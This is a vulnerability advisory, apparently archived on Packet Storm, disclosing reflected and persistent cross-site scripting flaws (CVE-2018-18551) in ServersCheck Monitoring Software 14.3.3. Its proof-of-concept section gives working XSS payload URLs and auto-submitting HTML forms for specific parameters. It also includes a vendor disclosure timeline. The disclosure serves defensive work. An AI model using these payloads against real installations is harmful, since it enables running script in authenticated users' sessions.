what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ServersCheck Monitoring Software 14.3.3 Cross Site Scripting

ServersCheck Monitoring Software 14.3.3 Cross Site Scripting
Posted Oct 23, 2018
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

ServersCheck Monitoring Software versions up through 14.3.3 suffer from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2018-18551
SHA-256 | f72e50d49c38f1006ec46a87b034d9463e5d15724a14d0dd13e5b11b88e2ed16

ServersCheck Monitoring Software 14.3.3 Cross Site Scripting

Change Mirror Download
[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2018-18551-SERVERSCHECK-MONITORING-SOFTWARE-CROSS-SITE-SCRIPTING.txt
[+] ISR: ApparitionSec


Greetz: ***Greetz: indoushka | Eduardo B.***


[Vendor]
www.serverscheck.com


[Product]
ServersCheck Monitoring Software - through 14.3.3

Software for monitoring your edge computing infrastructure, network & servers.

http://downloads.serverscheck.com/monitoring_software/setup.exe
File hash: b7bffe4fc83b6a4586c099d6c62d8eeb



[Vulnerability Type]
Cross Site Scripting


[CVE Reference]
CVE-2018-18551


[Security Issue]
ServersCheck Monitoring Software has Reflected and Persistent XSS entry points available in many locations allowing arbitrary code execution in the security context
of the currently authenticated user.

sensors.html status parameter
sensors.html type parameter
sensors.html device parameter
report.html location parameter
group_delete.html group parameter
report_save.html query parameter
sensors.html location parameter
group_delete.html group parameter.


[References]
https://serverscheck.com/monitoring-software/release.asp


[Exploit/POC]

XSS 1)
http://127.0.0.1:1272/sensors.html?status=%3Cscript%3Ealert(0)%3C/script%3E

XSS 2)
http://127.0.0.1:1272/sensors.html?type=%3Cscript%3Ealert(1)%3C/script%3E&location=%27

XSS 3)
http://127.0.0.1:1272/sensors.html?device=%3Cscript%3Ealert(2)%3C/script%3E

XSS 4)
http://127.0.0.1:1272/report.html?location=&sensor_types=%3C%2Fh2%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch2%3E

XSS 5)
http://127.0.0.1:1272/group_delete.html?group=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E

XSS 6)
http://127.0.0.1:1272/report_save.html?query=%27%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

XSS 7)
http://127.0.0.1:1272/sensors.html?location=&type=%3C%2Fli%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cli%3E

XSS 8)
http://127.0.0.1:1272/group_delete.html?group=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E


XSS 9)

<form action="http://127.0.0.1:1272/report.html" method="post">
<input type="hidden" name="datefrom" value="'/><script>alert(1)</script>">
<input type="hidden" name="dateto" value="9%2F29%2F2018+21%3A52">
<input type="hidden" name="location" value="">
<input type="hidden" name="sensor_types" value="CPUcontrol_sgw">
<script>document.forms[0].submit()</script>
</form>


XSS 10)
<form action="http://127.0.0.1:1272/report.html" method="post">
<input type="hidden" name="datefrom" value="9%2F29%2F2018">
<input type="hidden" name="dateto" value="9%2F29%2F2018+21%3A52">
<input type="hidden" name="every" value="'><script>alert(1)</script>">
<input type="hidden" name="report_title" value="POC">
<input type="hidden" name="sensor_names" value="">
<input type="hidden" name="sensor_types" value="PING">
<input type="hidden" name="time_frame" value="4h">
<script>document.forms[0].submit()</script>
</form>


XSS 11)
<form action="http://127.0.0.1:1272/report.html" method="post">
<input type="hidden" name="datefrom" value="9%2F29%2F2018">
<input type="hidden" name="dateto" value="9%2F29%2F2018+21%3A52">
<input type="hidden" name="every" value="0">
<input type="hidden" name="report_title" value="'><script>alert(1)</script>">
<input type="hidden" name="sensor_names" value="">
<input type="hidden" name="sensor_types" value="PING">
<input type="hidden" name="time_frame" value="4h">
<script>document.forms[0].submit()</script>
</form>

XSS 12)
<form action="http://127.0.0.1:1272/report.html" method="post">
<input type="hidden" name="datefrom" value="9%2F29%2F2018">
<input type="hidden" name="dateto" value="9%2F29%2F2018+21%3A52">
<input type="hidden" name="every" value="0">
<input type="hidden" name="report_title" value="PWN">
<input type="hidden" name="sensor_names" value="'><script>alert(1)</script>">
<input type="hidden" name="sensor_types" value="PING">
<input type="hidden" name="time_frame" value="4h">
<script>document.forms[0].submit()</script>
</form>


13 PERSISTENT XSS)
http://127.0.0.1:1272/floorplan_editor.html?floorplan=16
PARAM lat & lng & location_name
http://127.0.0.1:1272/location_save.html
;alert(1);


[Network Access]
Remote


[Severity]
Medium


[Disclosure Timeline]
Vendor Notification: October 6, 2018
Vendor acknowledgement: October 7, 2018
Vendor release v14.3.4 : October 7th, 2018
CVE assign by Mitre: October 21, 2018
October 22, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    53 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close